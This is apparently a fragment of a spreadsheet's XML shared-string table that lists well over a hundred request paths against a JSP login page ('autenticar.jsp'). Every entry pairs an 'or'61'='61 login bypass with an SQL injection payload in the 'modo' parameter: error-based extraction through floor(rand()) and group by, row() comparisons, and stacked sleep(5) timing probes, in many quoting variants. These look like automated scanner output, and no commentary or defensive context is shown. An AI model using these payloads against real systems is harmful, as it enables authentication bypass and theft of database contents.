  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8657")or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("vyjz"="vyjz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4348</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3966"))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("hfyd"="hfyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9647</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3046")))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("egbk"="egbk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3724</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6678"or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"jwsu"="jwsu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6587</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-594")or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("upnq"like"upnq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8207</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-846"))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("cgsv"like"cgsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4830</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4098")))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("xubu"like"xubu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4239</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1633"or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"hoav"like"hoav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-296</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8476)orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3261</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5553')orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7728</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7401'orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1608</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6143"orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3198</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7987)orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and(6358=6358</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6962</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8404))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and((2242=2242</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3851</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4151)))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and(((2971=2971</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9471</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3814orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3528</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8982')orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and('qoxm'='qoxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1316</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6981'))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and(('pmsv'='pmsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8672</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3210')))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and((('dypv'='dypv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1549</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7397'orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and'qkuy'='qkuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2226</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5790')orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and('aeta'like'aeta</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6084</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5034'))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and(('nyio'like'nyio</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6960</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-94')))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and((('piup'like'piup</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3216</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9721'orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and'reld'like'reld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4366</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9867")orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and("qogw"="qogw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3509</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2794"))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and(("ajvc"="ajvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8465</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9550")))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and((("fugh"="fugh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4001</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6658"orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and"jclv"="jclv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5850</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7772")orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and("cfyr"like"cfyr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3208</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5753"))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and(("rhmn"like"rhmn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9376</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-780")))orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and((("fuky"like"fuky</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7001</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3465"orrow(6224,7720)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6224=6224)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select6224unionselect7720)agroupbyxlimit1)and"deyo"like"deyo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5769</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3040)or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8227</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5570')or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1901</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2243'or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1762</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5258"or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2731</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1067)or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(2134=2134</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6718</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1763))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((628=628</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2588</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5619)))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(((1270=1270</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7102</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-766or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4926</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1268')or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and('erte'='erte</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7583</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7151'))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(('vbad'='vbad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1791</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7242')))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((('xqzn'='xqzn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4575</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3241'or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and'xwpq'='xwpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8628</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5161')or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and('xwmd'like'xwmd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9930</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1461'))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(('kzxt'like'kzxt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4813</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7447')))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((('bahg'like'bahg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4404</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4359'or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and'buod'like'buod</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-566</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5626")or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and("ammw"="ammw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9861</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6557"))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(("nsdn"="nsdn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1251</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6283")))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((("brqi"="brqi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3632"or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and"nvsb"="nvsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1358</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-341")or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and("xfwa"like"xfwa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4033</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3645"))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(("yyoy"like"yyoy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4936</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9707")))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((("bale"like"bale</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5195</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3403"or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(5299=5299)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and"fmtg"like"fmtg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select8167from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(8167=8167)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select49from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(49=49)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectsleep(5);--and(9936=9936</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectsleep(5);--and((4083=4083</t>
  </si>
  <si>
